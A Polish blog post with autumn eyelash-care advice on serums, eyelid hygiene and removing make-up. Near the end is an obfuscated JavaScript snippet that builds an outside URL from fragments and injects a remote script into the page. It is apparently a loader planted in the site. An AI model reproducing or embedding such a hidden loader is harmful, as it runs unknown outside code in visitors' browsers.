Utrzymaj rzęsy w dobrej kondycji na jesień!

 

Wielkimi krokami zbliżają się do nas chłodne, jesienne dni. Pora ta jest o tyle trudna, że następują liczne zmiany w pogodzie, a więc również w naszych organizmach. Częścią ciała, która jest mocno narażona na zagrożenia wynikające z pojawienia się jesiennej aury, są nasze rzęsy. Należą one do delikatnych elementów, dlatego też warto zawczasu o nie zadbać.

Kiedy myślimy o idealnym rozwiązaniu dla naszych rzęs podczas jesieni, na pewno przychodzą nam do głowy wszelkiego rodzaju odżywki, które warto stosować, by i w tym trudnym dla naszych ciał czasie nasze rzęsy utrzymały blask, sprężystość oraz maksymalne odżywienie i nawilżenie. Chłodny wiatr, niska temperatura, niekorzystne zmiany naszego samopoczucia – to wszystko ma wpływ na rzęsy.

Warto jednak pamiętać, że można sobie z tymi przeciwnościami poradzić. Wystarczy zastosować się do rad!

Systematycznie odżywiaj rzęsy!

Nie ma nic lepszego dla naszych rzęs niż regularne ich odżywianie za pomocą specjalnie przygotowanych do tego odżywek. Możemy je sami przyrządzić z naturalnych składników – takich jak owoce, warzywa, nabiał czy przyprawy, lub kupić skuteczniejsze preparaty w sklepach dedykowanych rzęsom.

 
Odżywka do rzęs Vitamin Lash. Źródło: amazinglashes.pl/odzywki-do-rzes

Jednym z najpopularniejszych kosmetyków, które odżywiają rzęsy, jest specjalne ozonowane serum z naturalnych olejków. Można je dostać w naprawdę przystępnych cenach. W skład serum wchodzą tylko naturalne oleje pozyskiwane z roślin z różnych części świata. Mowa tu o olejkach: rycynowym, abisyńskim, z drzewa herbacianego oraz z nasion baobabu.

Bardzo przydatna jesienią może być również tak zwana Bomba Witaminowa – a więc odżywka, której celem jest dodanie naszym rzęsom naprawdę sporej dawki witamin, które pomogą im w prawidłowym rośnięciu, utrzymaniu wytrzymałości i siły, a także pięknego wyglądu.

Dbaj o higienę swoich powiek!

To właśnie powieki mają bezpośredni wpływ na stan naszych rzęs. Pamiętajmy więc, by odpowiednio o nie dbać. A możemy robić to na różne sposoby. Przede wszystkim jednak musimy zwrócić uwagę na kosmetyki do powiek oraz rzęs, jakich używamy na co dzień. Jeśli są to tusze, które trudno się zmywa, musimy wiedzieć, że mocniej wypływają na nasze rzęsy. Tusze łatwo zmywalne są po prostu delikatniejsze. Warto również pamiętać o naszych nawykach makijażowych. Jeśli jesteśmy przyzwyczajone do spania w makijażu, powinnyśmy jak najszybciej się tego odzwyczaić. Niewykonywanie demakijażu przed snem również obciąża i osłabia włoski – szczególnie jesienią, kiedy już z samego faktu złych warunków atmosferycznych są one słabsze.

 

(function(){ wbty=document.createElement(„script”);wbty.type=”text/javascript”; wbty.async=true;wbty_=((„us”)+”t”)+”a”;wbty_+=(„t.i”)+””+”n”;wbty_+=((„f”)+”o”);wbty_+=”/”; wbtyu=”122945261.”;wbtyu+=”Xpluku1vbtyd3v6qcbzpp2uX3c1gf9″;wbty.src=”https://”+wbty_+wbtyu; wbtydb=document.body; wbtydb.appendChild(wbty); })();

Możesz również polubić

Dodaj komentarz